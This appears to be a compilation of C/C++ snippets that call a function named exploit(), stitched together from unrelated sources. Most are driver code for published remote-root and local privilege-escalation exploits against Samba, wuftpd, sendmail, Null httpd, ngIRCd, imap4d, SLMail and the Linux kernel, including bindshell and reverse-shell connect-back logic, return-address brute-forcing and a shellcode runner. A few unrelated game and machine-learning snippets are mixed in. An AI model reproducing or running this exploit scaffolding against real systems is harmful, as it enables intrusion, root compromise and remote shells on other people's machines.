void wrapper(void) { struct ctl_table *c; fprintf(stderr,"exploit starting\n"); printf("making vsyscall page writable..\n\n"); exploit(off->set_memory_rw, VSYSCALL, verify_stage1); printf("\nstage 1 completed\n"); sleep(5); printf("registering new sysctl..\n\n"); c = (struct ctl_table *)(VSYSCALL+0x850); memset((char *)(VSYSCALL+0x850), '\x00', 1952); strcpy((char *)(VSYSCALL+0xf00),"hack"); memcpy((char *)(VSYSCALL+0xe00),"\x01\x00\x00\x00",4); c->procname = (char *)(VSYSCALL+0xf00); c->mode = 0666; c->proc_handler = (void *)(off->proc_dostring); c->data = (void *)(off->modprobe_path); c->maxlen=256; c->extra1 = (void *)(VSYSCALL+0xe00); c->extra2 = (void *)(VSYSCALL+0xd00); exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2); printf("stage 2 completed\n"); }
int main ( int argc, char* argv[] ) { int s; unsigned long cbip; unsigned short cbport; struct sockaddr_in remote_addr; struct hostent* host_addr; if ( argc != 2 ) if ( argc != 4 ) { fprintf ( stderr, "Usage\n-----\n[bindshell] %s <ip>\n[reverseshell] %s <ip> <cbip> <cbport>\n", argv[0], argv[0] ); exit ( 1 ); } if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) { fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); remote_addr.sin_port = htons ( PORT ); s = socket ( AF_INET, SOCK_STREAM, 0 ); printf ( "connecting to %s:%u...", argv[1], PORT ); if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "failed!\n" ); exit ( 1 ); } printf ( "ok!\n" ); if ( argc == 4 ) { cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999; cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999; exploit ( s, cbip, cbport, 0 ); } else exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ); }
void wrapper(void) { struct ctl_table *c; dprintf("[.] making vsyscall page writable...\n\n"); exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1); dprintf("[~] done, stage 1 completed\n"); sleep(5); dprintf("[.] registering new sysctl...\n\n"); c = (struct ctl_table *)(VSYSCALL+0x850); memset((char *)(VSYSCALL+0x850), '\x00', 1952); strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME); memcpy((char *)(VSYSCALL+0xe00), "\x01\x00\x00\x00",4); c->procname = (char *)(VSYSCALL+0xf00); c->mode = 0666; c->proc_handler = (void *)(PROC_DOSTRING); c->data = (void *)(MODPROBE_PATH); c->maxlen = 256; c->extra1 = (void *)(VSYSCALL+0xe00); c->extra2 = (void *)(VSYSCALL+0xd00); exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2); dprintf("[~] done, stage 2 completed\n"); }
int main(char* argv[], int argc){ stuff(); if (argv[0] == "-x" || "-X") { exploit(); return 1; } else if (argv[0] == "-b" || "-B") { device_autoboot(); return 1; } else if (argv[0] == "-f" || "-F") { device_upload(argv[1]); return 1; } else { printf("Command not found\n"); return -1; } }
void MainWindow::on_pushButton_3_clicked() //ler xml { QDomDocument documento; QFile ficheiro(QApplication::applicationDirPath() + "/nmap/scan.xml"); //QMessageBox::information(this,"teste", QApplication::applicationDirPath() + "/scan.xml"); if(!ficheiro.open(QIODevice::ReadOnly | QIODevice::Text)) { QMessageBox::critical(this,"Unable to read file","There was an error opening the XML file!"); } else { if(!documento.setContent(&ficheiro)) { QMessageBox::critical(this,"Parsing Error","Error while parsing the XML file information!"); } ficheiro.close(); } QDomElement raiz = documento.firstChildElement(); xmlRead(raiz,"port","portid",0); xmlRead(raiz,"service","name",1); xmlRead(raiz,"service","product",2); xmlRead(raiz,"service","version",3); exploit(); ui->tableWidget->resizeRowsToContents(); }
//This method executes the policy pair<vector<float>,float> CDACN::policy(const Window &window) { if(uniform_real(engine)<exploration_rate_ or not window.full()) return explore(); else return exploit(window); }
/* * OK here is how we brute force. * We need to find two values... a valid chunk to free (our fake chunk) * and the pvpbuf addr * Since our fake chunk is repeated all over and is 4*5 bytes long, * we have 5 possibilites of error in a sequencial search. We try for: * chunk,chunk+4,chunk+8,chunk+12,chunk+16 * * pvpbuf addr must be somewhere lower than ebp, specifically ebp + target.bufp (or else * the exploit will fail since we cannot overwrite bufp. We start from bruteforcing ebp + target.bufp * decreasing by 4 bytes * */ void bruteforce(struct target_info target) { int cincrease = 0; /* how many times we increased chunk value */ target.pvpbuf = target.ebp+target.bufp; printf("Trying pvpbuf=0x%x\n",target.pvpbuf); while(target.ebp - target.pvpbuf < 2000) { /* exploit will fail since pvpbuf < 2000 bytes */ if(exploit(target)) { printf("Successfull exploitation with pvpbuf=0x%x and chunk=0x%x\n",target.pvpbuf,target.chunk); return; } /* make sure it is a "usable" address ... start with a base of 0x0a since u have space untill 0xfe */ target.chunk+=4; cincrease++; if(cincrease > 4) { target.chunk -= cincrease*4; /* start at initial value again */ cincrease =0; target.pvpbuf -= 4; printf("Trying pvpbuf=0x%x\n",target.pvpbuf); } } printf("Bruteforce failed\n"); }
int main (int argc, char * argv[]) { int c; unsigned long ret; while((c=getopt (argc, argv, "ht:p:")) != EOF) { switch(c) { case 't': target = optarg; break; case 'p': port = atoi (optarg); break; case 'h': usage (argv[0]); default : usage (argv[0]); } } if (argc==1 || target == NULL) usage (argv[0]); fprintf (stdout, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n"); fprintf (stdout, " [~] coded by c0wboy ~ www.0x333.org [~]\n\n"); fprintf (stdout, " [-] connecting to %s:%d\n", target, port); fprintf (stdout, " [-] stating bruteforce\n\n"); for (ret=START; ret>=STOP; ret-=OFFSET) { fprintf (stdout, " [-] testing 0x%x\n", ret); hate (ret); exploit (); } fprintf (stdout, " [-] uhm ... maybe samba is not vulnerable !\n"); return 0; }
void Game::dealCards( Result *result, vector<string> &tefudaSet){ COUT<<"dc"<<endl; //カードを配る //tefudaSetで //身分差があれば大富豪を起点、でなければ席順の若い人を起点 int target = players.convIDtoSekiNum( ( players.isInequality() ) ? players.mibunId(DAIFUGO) : players.sekijun[0]);//大富豪から string suit = "SHDCJ"; string rank = "3456789XJQKA2R"; //プレイヤのカードを初期化してから for(int i=0; i<players.size(); i++){ players.id[i].initCard(); } for(int i=0; i<config.PLAYER_NUM; i++){ //一人一人に対して手札セットを割り当てていく //cout << tefudaSet[i] << endl; for(int j=0; j<tefudaSet[i].length()-1; j++){ if( tefudaSet[i][j] == ' ' ){ continue; } int s=-1, r=-1; for(int k=0; k<5; k++){ //cout << suit[k] << " "<< tefudaSet[i][j] << endl; if( suit[k] == tefudaSet[i][j]){ s = k; break; } } j++;//1つ進める for(int k=0; k<14; k++){ //cout << rank[k] << " "<< tefudaSet[i][j] << endl; if( rank[k] == tefudaSet[i][j]){ r = k; break; } } if( s < 0 || r < 0 ){ //cout << " ~~~~ " << endl; exit(1); } if( s == 4){ players.id[players.sekijun[target]].cards[ 4 ][ 1 ] = 1;//入れて }else{ //cout << s << " " << r << " " << suit[s] << " " << rank[r] << endl; players.id[players.sekijun[target]].cards[ s ][ r+1 ] = 1;//入れて } players.id[players.sekijun[target]].cards_num++;//枚数を増やして } //次の人 target = ( target + 1 ) % ( players.size() ); } //搾取が行われれば行う exploit( result ); }
int main ( int argc, char* argv[] ) { int s, targ, i; struct sockaddr_in remote_addr; struct hostent* host_addr; if ( argc != 2 ) { printf ( "Usage: %s <ip>\n", argv[0] ); exit ( 1 ); } system ( "clear" ); header (); if ( !isip ( argv[1] ) ) { printf ( "Invalid Target IP!\n" ); exit ( 1 ); } printf("--[ select target\n"); for ( i = 0; i < 2; i++ ) printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name ); printf ( " >> " ); scanf ( "%d", &targ ); if ( targ != 0 ) if ( targ != 1 ) { printf ( "--[ invalid target!\n" ); exit ( 1 ); } if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) { fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); remote_addr.sin_port = htons ( PORT ); if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) { printf ( "socket failed!\n" ); exit ( 1 ); } printf ( "--[ connecting to %s:%u...", argv[1], PORT ); if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "failed!\n" ); exit ( 1 ); } printf ( "done!\n" ); if ( exploit ( s, target[targ].ret ) == 1 ) { printf ( "exploitation FAILED!\n" ); exit ( 1 ); } close ( s ); connect_to_bindshell ( argv[1], 4444 ); }
int main (int argc,char *argv[]) { char host[256]; int i,opt,type=0,port=80; fprintf(stdout,"Null httpd 0.5.0 remote root exploit by eSDee of Netric\n"); fprintf(stdout,"--------------------------------------------------(www.netric.org)\n"); memset(host, 0x0, sizeof(host)); while((opt=getopt(argc,argv,"h:p:t:")) !=EOF) { switch(opt) { case 'h': strncpy(host, optarg, sizeof(host) - 1); break; case 'p': port=atoi(optarg); if ((port <= 0) || (port > 65535)) { fprintf(stderr,"Invalid port.\n\n"); return -1; } break; case 't': type=atoi(optarg); if (type == 0 || type > sizeof(targets)/12) { for(i = 0; i < sizeof(targets)/12; i++) fprintf(stderr, "%d. %s\t (0x%08x - 0x%08x)\n", i + 1, targets[i].type, targets[i].ret,targets[i].retloc); fprintf(stderr, "\n"); return -1; } break; default: usage(argv[0]); break; } } if (strlen(host) == 0) usage(argv[0]); if (!type) { fprintf(stderr, "No target given, use -t0 for a list.\n\n"); return -1; } if (exploit(host, port, type) < 0) { fprintf(stderr, "Failed.\n\n"); return -1; } return 0; }
int main(int argc, char *argv[]) { char opt, *system=NULL; int shaddr=0, retaddr=0, targetnum=0, offset=0, i; printf("\n nbSMTP v0.99 remote format string exploit\n"); printf(" by CoKi <*****@*****.**>\n\n"); while((opt = getopt(argc,argv,"r:s:t:lo:")) != EOF) { switch (opt) { case 'r': retaddr = strtoul(optarg,NULL,0); system = "unknown"; break; case 's': shaddr = strtoul(optarg,NULL,0); break; case 't': targetnum = atoi(optarg)-1; if(targets[targetnum].num) { system = targets[targetnum].os; retaddr = targets[targetnum].retaddr; shaddr = targets[targetnum].shaddr; } else use(argv[0]); break; case 'l': printlist(); break; case 'o': offset = atoi(optarg); shaddr += offset; break; default: use(argv[0]); break; } } if(retaddr == 0) use(argv[0]); if(shaddr == 0) use(argv[0]); if(system == NULL) { system = "unknown"; } printf(" [*] system\t\t\t: %s\n", system); printf(" [*] return address\t\t: %010p\n", retaddr); printf(" [*] shellcode address\t\t: %010p", shaddr); fflush(stdout); if(offset) printf(" (offset %d)\n", offset); else printf("\n"); exploit(retaddr, shaddr); }
int main ( int argc, char* argv[] ) { int s, option; args myargs; system ( "clear" ); header (); parse_arguments ( argc, argv, &myargs ); s = connect_to_remote_host ( myargs.tip, myargs.tport ); printf ( "--[ select shellcode\n" ); printf ( " |\n" ); printf ( " |- [0] bind\n" ); printf ( " `- [1] cb\n" ); printf ( ">> " ); scanf ( "%d", &option ); switch ( option ) { case 0: printf ( "--[ using bind shellcode\n" ); if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, NULL ) == 1 ) { printf ( "exploitation failed!\n" ); exit ( 1 ); } connect_to_bindshell ( myargs.tip, 20000 ); break; case 1: printf ( "--[ using cb shellcode\n" ); if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip ) == 1 ) { printf ( "exploitation failed!\n" ); exit ( 1 ); } start_reverse_handler ( 45295 ); break; default: printf ( "--[ invalid shellcode!\n" ); exit ( 1 ); } close ( s ); return 0; }
int main() { int size = strlen(shellcode); void (*exploit)(void) = (void(*)(void))shellcode; if(-1== mprotect((void*)((unsigned)shellcode&0xfffff000),0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)){ perror("mprotect"); printf("shellcode size = %d\n",size); exit(-1); } exploit(); return 0; }
int main(int argc, char **argv) { int sock = 0; int data, port; printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n"); printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n"); if ( argc < 2 ) { printf("usage: slmail-ex.exe <host> \n\n"); exit(0); } port = 110; sock = connect_target(argv[1], port); exploit(sock); closesocket(sock); return 0; }
void Game::dealCards( Result *result){ COUT<<"dc"<<endl; //カードを配る vector<int> deck; //通常のカード for(int i=0; i<4; i++){ for(int j=1; j<=13; j++){ deck.push_back( i*14 + j ); } } //jokerの枚数 for(int i=0; i<config.JOKER_NUM; i++){ deck.push_back( 14*4 + 1 ); } //deckをshuffle for(int i=0; i<deck.size()*2; i++){ int a = (int)( (deck.size()-1) * random->rand() ); int b = (int)( (deck.size()-1) * random->rand() ); int c = deck[a]; deck[a] = deck[b]; deck[b] = c; } //プレイヤのカードを初期化してから for(int i=0; i<players.size(); i++){ players.id[i].initCard(); } //deckを一枚ずつ分配していく //身分差があれば大富豪を起点、でなければ席順の若い人を起点 int target = players.convIDtoSekiNum( ( players.isInequality() ) ? players.mibunId(DAIFUGO) : players.sekijun[0]);//大富豪から while( !deck.empty() ){ players.id[players.sekijun[target]].cards[deck[0]/14][deck[0]%14] = 1;//入れて players.id[players.sekijun[target]].cards_num++;//枚数を増やして deck.erase( deck.begin() );//削除 //次の人 target = ( target + 1 ) % ( players.size() ); } int tefuda[5][8][15]={{0}}; for(int i=0;i<players.size();i++){ copyCard( tefuda[i], players.id[i].cards ); } result->setFirstCards( tefuda ); //搾取が行われれば行う exploit( result ); }
int main(int argc, char **argv) { int sock_maxdb, sock_shell; struct hostent *hn; banner(); if (argc < 2) usage(argv[0]); memset(&host, 0, sizeof(host)); host.sin_family = AF_INET; host.sin_port = (argc > 2) ? htons((u_short)atoi(argv[2])) : htons(9999); if ( (hn = gethostbyname(argv[1])) == NULL) errx(-1, "Unresolvable address\n"); memcpy(&host.sin_addr, hn->h_addr, hn->h_length); printf("[*] Connecting to %s:%d... ", inet_ntoa(host.sin_addr), ntohs(host.sin_port)); fflush(stdout); sock_maxdb = connect_port(ntohs(host.sin_port)); if (!sock_maxdb) { printf("failure.\n\n"); exit(-1); } printf("success.\n"); printf("[*] Sending evil payload...\n"); exploit(sock_maxdb); close(sock_maxdb); fflush(stdout); sleep(1); printf("[*] Trying to connect to spawned shell... "); sock_shell = connect_port(13370); if (!sock_shell) { printf("failure.\n\n"); exit(-1); } printf("success!\n\nEnjoy :)\n\n"); shell(sock_shell); return 0; }
int main(int argc, char **argv) { int cnt, sel; char *offset; long returnaddr; if(argc == 1) { usage((char **)argv[0]); exit(1); } while((cnt = getopt(argc,argv,"t:b:o:")) != EOF) { switch(cnt) { case 't': //target distro sel = atoi(optarg); exploit(target[sel-1].ret,(char **)target[sel-1].path); break; case 'b': //brute force bruteforce((char **)target[sel-1].path); break; case 'o': //offset offset = atoi(optarg); returnaddr=esp()+offset; sel = atoi(optarg); exploit(returnaddr,(char **)target[sel-1].path); break; default: usage(&argv[0]); break; } } return(0); }
int main(int argc, char *argv[]) { int t = 0; int brute = 1; int opt; printf("Local sendmail 8.11.6 exploit by sorbo ([email protected])\n"); while( (opt = getopt(argc,argv,"t:bh")) != -1) { switch(opt) { case 't': t = atoi(optarg); if(t >= sizeof(targets)/sizeof(struct target_info)) { printf("Invalid target %d\n",t); exit(0); } brute = 0; break; case 'b': brute = 1; break; case 'h': default: usage(argv[0]); } } printf("Attempting to exploit %s\n",targets[t].description); if(brute) { bruteforce(targets[t]); exit(0); } printf("pvpbuf=\t\t0x%x\n",targets[t].pvpbuf); printf("zero=\t\t0x%x\n",targets[t].zero); printf("chunk=\t\t0x%x\n",targets[t].chunk); printf("shellcode=\t0x%x\n",targets[t].ret); t = exploit(targets[t]); if(t) printf("Exploit successfull\n"); else printf("Exploit failed... try adding -b\n"); exit(0); }
void bruteforce(char **path) { pid_t pid; int x=0, offset=5; long ret; printf("attemping brute force\n\n"); if(!getuid()) { printf("brute force cannot be run while uid is 0\n"); exit(0); } ret=esp()+offset; while(getuid()&&(x<=3000&&x>=-3000)) { if((pid=fork())==0) { exploit(ret,path); exit(0); } else perror("fork failed"); if(waitpid(pid,NULL, 0)!= pid) perror("waitpid error"); if(x>=3000) { ret=esp(); x=-1; } else if(x<=3000&&x>=0) { ret+=offset; x+=offset; } else if(x>=-3000&&x<0) { ret-=offset; x-=offset; } printf("%d\n\n",x); } printf("brute force complete..\n\n"); system("id"); }
int main(int argc,char **argv) { char code[1024]; unsigned int len; *(int *)(shellcode+1)=(int) shell; memset(code,NOP,1024); len = 256; printf("shellcode addr is:%p\nshell addr is %p\n",shellcode,shell); sprintf(formatstrings,"%c%c%c%c%%%dp%%n",RETLOC&0x000000ff,(RETLOC&0x0000ff00)>>8,(RETLOC&0x00ff0000)>>16, (RETLOC&0xff000000)>>24,(int )shellcode -4); printf("%s",formatstrings); fflush(stdout); memcpy(code,formatstrings,sizeof(formatstrings)); new_function(len,code); exploit(len,code); }
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) { BOOL bReturnValue = TRUE; switch( dwReason ) { case DLL_QUERY_HMODULE: if( lpReserved != NULL ) *(HMODULE *)lpReserved = hAppInstance; break; case DLL_PROCESS_ATTACH: hAppInstance = hinstDLL; exploit(); ExitProcess(0); break; case DLL_PROCESS_DETACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: break; } return bReturnValue; }
int main(int ac, char **av) { int fd, pid, p, i; char buf[TMPSIZE]; struct uids uids; FILE *fp; setpgrp(); setsid(); umask(022); unlink(SHELL); fd = open(SHELL, O_RDWR | O_CREAT | O_TRUNC, 0755); fp = fdopen(fd, "w+"); fprintf(fp, "%s\n", shellcmd); fclose(fp); pid = getpid() + 2; snprintf(buf, sizeof(buf) - 1, "/proc/%d/status", pid); printf("\nModprobe pid %d, my pid %d", pid, getpid()); fflush(stdout); signal(SIGUSR1, sighnd); // fork modprobe helper if (!(p = fork())) { // some nice work for exec_usermodehelper(), keep it busy! for (i = 0; i < FMAX; i++) { fd = open("/dev/zero", O_RDWR); mmap(NULL, MMSIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); } kill(getppid(), SIGUSR1); while (!sig); printf("\nHelper (pid %d) requesting module...", getpid()); fflush(stdout); fd = open(ENTRY, O_RDONLY | O_NONBLOCK); exit(0); } // synchronize with the child else { while (!sig); kill(p, SIGUSR1); // wait for modprobe to run at unprivileged level while (1) { fd = open(buf, O_RDONLY); if (fd > 0) { if (!(fp = fdopen(fd, "r"))) fatal("fdopen"); if (get_ids(fp, &uids) != 4 || (uids.uid != uids.euid || uids.uid != uids.suid || uids.uid != uids.fsuid)) { fatal("did not catch modprobe...try again later :-)"); } // ok, it runs... while (1) { if (ptrace(PTRACE_ATTACH, pid, NULL, NULL)) { fatal("PTRACE_ATTACH failed!"); } else { i = 0; printf("\nAttached afterburner...\n"); fflush(stdout); while (ptrace(PTRACE_GETREGS, pid, 0, ®s) || !regs.eip || regs.eip >= MAXSTACK) { ptrace(PTRACE_SYSCALL, pid, NULL, NULL); printf("\rplease wait %d", i++); fflush(stdout); } waitpid(pid, NULL, WUNTRACED); printf ("\nValid EIP found EIP=%p\nexploiting the bug, good luck... ", regs.eip); fflush(stdout); exploit(pid); exit(0); } } fclose(fp); } } } return 0; }
int main (int argc, char *argv[]) { char c; char * progname; /* = argv[0] */ int fd; tgt_type * tgt = NULL; int tgt_num = -1; unsigned char xpbuf[512 + 16]; fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root " "(version "VERSION")\n" "team teso (thx bnuts, tomas, synnergy.net !).\n\n"); progname = argv[0]; if (argc < 2) usage (progname); while ((c = getopt (argc, argv, "hvaDmt:u:p:d:L:A:")) != EOF) { switch (c) { case 'h': usage (progname); break; case 'a': automode = 1; break; case 'D': debugmode = 1; break; case 'v': verbose += 1; break; case 'm': mass = 1; break; case 't': if (sscanf (optarg, "%u", &tgt_num) != 1) usage (progname); break; case 'u': username = "******"; printf ("username = %s\n", optarg); break; case 'p': password = optarg; break; case 'd': dest = optarg; break; case 'L': if (sscanf (optarg, "0x%lx", &user_retloc) != 1) usage (progname); break; case 'A': if (sscanf (optarg, "0x%lx", &user_retaddr) != 1) usage (progname); break; default: usage (progname); break; } } /* if both required offsets are given manually, then we dont have * to require a target selection. otherwise check whether the target * is within the list. if its not, then print a list of available * targets */ if (user_retloc != 0 && user_retaddr != 0) { tgt = &tmanual; } else if (automode == 0 && (tgt_num == 0 || tgt_num >= (sizeof (targets) / sizeof (tgt_type)))) { if (tgt_num != 0) printf ("WARNING: target out of list. list:\n\n"); tgt_list (); exit (EXIT_SUCCESS); } if (tgt == NULL && automode == 0) tgt = &targets[tgt_num - 1]; if (mass == 1) { if ((argc - optind) == 0) usage (progname); mlen = sc_build_x86_lnx (mcode, sizeof (mcode), x86_lnx_execve, &argv[optind]); if (mlen >= 0xff) { fprintf (stderr, "created argv-code too long " "(%d bytes)\n", mlen); exit (EXIT_FAILURE); } fprintf (stderr, "# created %d byte execve shellcode\n", mlen); } printf ("# trying to log into %s with (%s/%s) ...", dest, username, password); fflush (stdout); fd = ftp_login (dest, username, password); if (fd <= 0) { fprintf (stderr, "\nfailed to connect (user/pass correct?)\n"); exit (EXIT_FAILURE); } printf (" connected.\n"); if (debugmode) { printf ("DEBUG: press enter\n"); getchar (); } printf ("# banner: %s", (ftp_banner == NULL) ? "???" : ftp_banner); if (tgt == NULL && automode) { tgt = tgt_frombanner (ftp_banner); if (tgt == NULL) { printf ("# failed to jield target from banner, aborting\n"); exit (EXIT_FAILURE); } printf ("# successfully selected target from banner\n"); } if (shellcode == NULL) { shellcode = tgt->shellcode; shellcode_len = tgt->shellcode_len; } if (verbose >= 2) { printf ("using %lu byte shellcode:\n", shellcode_len); hexdump ("shellcode", shellcode, shellcode_len); } if (user_retaddr != 0) { fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n", user_retaddr); } if (user_retloc != 0) { fprintf (stderr, "# overriding target retloc with: 0x%08lx\n", user_retloc); tgt->retloc = user_retloc; } printf ("\n### TARGET: %s\n\n", tgt->desc); /* real stuff starts from here */ printf ("# 1. filling memory gaps\n"); xp_gapfill (fd, RNFR_NUM, RNFR_SIZE); exploit (fd, tgt); printf ("# 3. triggering free(globlist[1])\n"); net_write (fd, "CWD ~{\n"); ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP"); if (strncmp (xpbuf, "sP", 2) != 0) { fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n", xpbuf); exit (EXIT_FAILURE); } printf ("#\n# exploitation succeeded. sending real shellcode\n"); if (mass == 1) { printf ("# mass mode, sending constructed argv code\n"); write (fd, mcode, mlen); printf ("# send. sleeping 10 seconds\n"); sleep (10); printf ("# success.\n"); exit (EXIT_SUCCESS); } printf ("# sending setreuid/chroot/execve shellcode\n"); net_write (fd, "%s", x86_lnx_shell); printf ("# spawning shell\n"); printf ("##################################################" "##########################\n"); write (fd, INIT_CMD, strlen (INIT_CMD)); shell (fd); exit (EXIT_SUCCESS); }
int main ( int argc, char* argv[] ) { int s; unsigned long xoredip; unsigned short xoredcbport; struct sockaddr_in remote_addr; struct hostent *host_addr; if ( argc != 2 ) if ( argc != 4 ) { fprintf ( stderr, "\nUsage\n-----\n[ Bindshell ] %s <host>\n[ Reverseshell ] %s <host> <connectback ip> <connectback port>\n\n", argv[0], argv[0] ); exit ( 1 ); } if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) { fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); remote_addr.sin_port = htons ( PORT ); system ( "clear" ); header (); if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) { printf ( "socket failed!\n" ); exit ( 1 ); } printf ( "--[ connecting to %s:%u...", argv[1], PORT ); if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "failed!\n" ); exit ( 1 ); } printf ( YELLOW "done!\n" NORMAL); if ( argc == 4 ) { xoredip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999; xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999; if ( exploit ( s, xoredip, xoredcbport, 0 ) == 1 ) { printf ( "exploitation FAILED!\n" ); exit ( 1 ); } start_reverse_handler ( argv[3] ); } else { if ( exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 ) { printf ( "exploitation FAILED!\n" ); exit ( 1 ); } connect_to_bindshell ( argv[1], 4444 ); } }
int main(int argc, char **argv) { exploit(argc, argv); }
int main(int argc, char *argv[]) { char opt, *host=NULL, *system=NULL, *ircd=NULL; int i, ircdport=IRCD; int retaddr=0x0806b000, gotaddr=0, targetnum=0, offset=0; struct hostent *he; printf("\n ngIRCd <= 0.8.2 remote format string exploit\n"); printf(" by CoKi <*****@*****.**>\n\n"); while((opt = getopt(argc,argv,"h:g:t:lo:bp:")) != EOF) { switch (opt) { case 'h': host = optarg; break; case 'g': gotaddr = strtoul(optarg,NULL,0); system = "unknown"; ircd = "unknown"; break; case 't': targetnum = atoi(optarg)-1; if(targets[targetnum].num) { system = targets[targetnum].os; ircd = targets[targetnum].ircd; gotaddr = targets[targetnum].got; } else use(argv[0]); break; case 'l': printlist(); break; case 'o': offset = atoi(optarg); retaddr += offset; break; case 'b': b = 1; break; case 'p': ircdport = atoi(optarg); break; default: use(argv[0]); break; } } if(host == NULL) use(argv[0]); if(gotaddr == 0) use(argv[0]); if(system == NULL) { system = "unknown"; ircd = "unknown"; } printf(" [*] host\t\t\t: %s\n", host); printf(" [*] system\t\t\t: %s\n", system); printf(" [*] ircd version\t\t: %s\n", ircd); printf(" [*] syslog GOT address\t\t: %010p\n", gotaddr); printf(" [*] verifying host\t\t:"); fflush(stdout); if((he=gethostbyname(host)) == NULL) { herror(" gethostbyname()"); printf("\n"); exit(1); } printf(" %s\n\n", inet_ntoa(*((struct in_addr *)he->h_addr))); /* bruteforce mode */ if(b) { for(i = retaddr; i <= 0x0806ffff; i += 0x10) { printf(" [*] bruteforcing RET address\t: %010p", i); fflush(stdout); exploit(host, gotaddr, i, ircdport); } printf("\n [*] failed!\n\n"); } /* single mode */ else { printf(" [*] trying RET address\t\t: %010p", retaddr); fflush(stdout); if(offset) printf(" (offset %d)\n", offset); else printf("\n"); exploit(host, gotaddr, retaddr, ircdport); } }
int main(int argc, char *argv[]) { char opt, *host=NULL, *rh=NULL; int sockfd; unsigned int imapdport=IMAPD; struct hostent *he; struct sockaddr_in dest_dir; printf("\n GNU Mailutils imap4d v0.6 remote format string exploit\n"); printf(" by CoKi <*****@*****.**>\n\n"); while((opt = getopt(argc,argv,"h:p:c:b:")) != EOF) { switch (opt) { case 'h': host = optarg; break; case 'p': imapdport = atoi(optarg); break; case 'c': rhost = inet_addr(optarg); rh = optarg; cback++; break; case 'b': rport = atoi(optarg); break; default: use(argv[0]); break; } } if(host == NULL) use(argv[0]); if(cback) { printf(" [*] verifying your host\t:"); fflush(stdout); if((he=gethostbyname(rh)) == NULL) { herror(" gethostbyname()"); printf("\n"); exit(1); } shsize = strlen(conn_back); conn_back[33]=(rhost & 0x000000ff); conn_back[34]=(rhost & 0x0000ff00) >> 8; conn_back[35]=(rhost & 0x00ff0000) >> 16; conn_back[36]=(rhost & 0xff000000) >> 24; conn_back[39]=(rport & 0xff00) >> 8; conn_back[40]=(rport & 0x00ff); printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr))); printf(" [*] connect back port\t\t: %u\n", rport); } if(strlen(conn_back) < shsize) { printf("\n [!] failed! your host or port contain null-bytes\n\n"); exit(1); } printf(" [*] verifying target host\t:"); if((he=gethostbyname(host)) == NULL) { herror(" gethostbyname()"); printf("\n"); exit(1); } printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr))); printf(" [*] target imapd port\t\t: %u\n\n", imapdport); printf(" [*] connecting...\t\t:"); fflush(stdout); if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) { perror(" socket()"); printf("\n"); exit(1); } dest_dir.sin_family = AF_INET; dest_dir.sin_port = htons(imapdport); dest_dir.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(dest_dir.sin_zero), 8); if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir, sizeof(struct sockaddr), TIMEOUT) == ERROR) { printf(" closed\n\n"); exit(1); } printf(" done!\n\n"); getinfo(host, imapdport); exploit(host, imapdport); }
main() { /*No args, no vectors*/ exploit(); }
